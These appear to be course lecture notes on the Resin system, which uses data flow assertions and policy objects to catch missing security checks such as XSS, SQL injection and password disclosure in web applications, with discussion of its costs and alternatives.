Resin ===== what kinds of problems is this paper trying to address? threat model trusted: hardware/os/language runtime/db/app code untrusted: external inputs (users/whois servers) non-goals: buffer overflows, malicious apps programming errors: missing security checks in application code sanitizing user inputs for code injection calling access control functions for sensitive data protected wiki page; user's password Example: one web server, multiple users users interact with each other reading posts in a web forum avatar url / upload post content profile / signature attacker's plan: inject JS code / forge requests victim's browser sees this code in the HTML page, runs it what kind of code could attacker inject? steal the cookie transfer credits acl privileged operations (for admin) why doesn't the browser's same-origin policy protect the cookie? as far as the browser is concerned, code came from server's origin lower level: the zookws web server was vulnerable http://.../ returns: File not found: / a similar problem: whois injection admin views logs: user, ip, domain malicious whois server problems arise if programmer forgets to quote external inputs different kind of a problem: access control checks might have protected pages in a wiki, forget to call ACL function example: hotcrp's password disclosure typical web site, sends password reminders email preview mode displays emails instead of sending turns out to display pw reminders in the requesting user's browser kind-of like the confused deputy prob: no module is really at fault? why are the checks missing? lots of places in the code where they need to be performed think of application as a black box; lots of inputs and outputs suppose that for a given output, only some inputs were OK e.g. sanitize user inputs in a SQL query, but not app's own data hard to tell where the output's data came from so, programmers try to do checks on all possible paths programmer forgets them on some paths from input to output plug-in developers may be unaware of security plan what's the plan to prevent these? think of the checks as being associated with data flows input->output associate checks with data objects like user input or password strings perform checks whenever data gets used in some interesting way what does resin provide? hotcrp data: password [ diagram from figure 1 ] policy objects contains code to implement policy for its data hotcrp: only email password to the user or the pc chair what methods does the programmer have to implement in a policy object? export_check(context) merge [optional] filter objects data flow boundaries channels with contexts: http, email, ... provided by default by resin for most external channels invoke export_check if possible data tracking how does this work? assumes a language runtime python, php have a byte code representation, sort-of like java resin tags strings, integers with a policy object changes the implementation of operations that manipulate data why only tag strings and integers? what about other things? what kinds of operations propagate? why not propagate across "covert" or "implicit" channels? why byte-level tracking? what happens when data items are combined? common: concat strings (automatic via byte-level tracking) rare: add integers what are all of the uses for filter objects? default filters for external boundaries: sockets, pipes, http, email persistent serialization files: extended attributes database: extra columns for policies, SQL rewriting example: write password to file/db code imports interpreter's input is yet another kind of channel write access control persistent filters on FS objects like files, directories almost a different kind of check: tied to an external object, not data propagation rules for functions sha1(), strtoupper(), .. how would you use resin to prevent missing checks? hotcrp cross-site scripting: profile UntrustedData & XFilter calls strip and removes the policy? define UntrustedData and JSSantitized, empty export_check input tagged UntrustedData strip function attach JSSantitized output filter checks strings must contain JSSantitized if UntrustedData exists alternative: UntrustedData policy only; filter parses and sanitizes strings does this system actually work? two versions of resin, one for python and one for php prevented known bugs in real apps prevented unknown bugs in real apps too few different kinds of bugs (ACL, XSS, SQL inj, directory traversal, ..) is it possible to forget checks with resin? what does resin provide/guarantee? are there potential pitfalls with resin's assertions? how much code is required to write these assertions? why? how specific are the assertions to the bug you want to prevent? why? how did they prevent the myphpscripts login library bug? what's the cost? need to deploy a new php/python interpreter need to write some assertions (policy objects?) runtime overheads: memory to store policies, CPU time to track them major cost: serializing policies to SQL, file system could that be less? e.g. avoid storing email twice in hotcrp? how else can you avoid these missing check problems? IFC does data tracking in some logical sense trade-off: redesign/rewrite your app around some checks hard to redesign around multiple checks or to add a check later java stack inspection can't automatically perform checks for things that are off the stack can check if file is being read through a sanitizing/ACL-check function crimps programmer's style, but in theory possible express some of these checks in the type system maybe have a special kind of UntrustedString vs SafeString and conversely SQLString and HTMLString which get used for output special conversion rules for them could even do static checks for these data flows for password disclosure, ACL checks: maybe a delayed-check string? when about to send out the string, tell it where you're sending it almost like resin design problem with using the type system: policies intertwined with code throughout the app to add a new check, need to change types everywhere resin is almost like a shadow type system could you apply resin to other applications, or other environments? different languages? different machines (cluster of web servers)? no language runtime? untrusted/malicious code?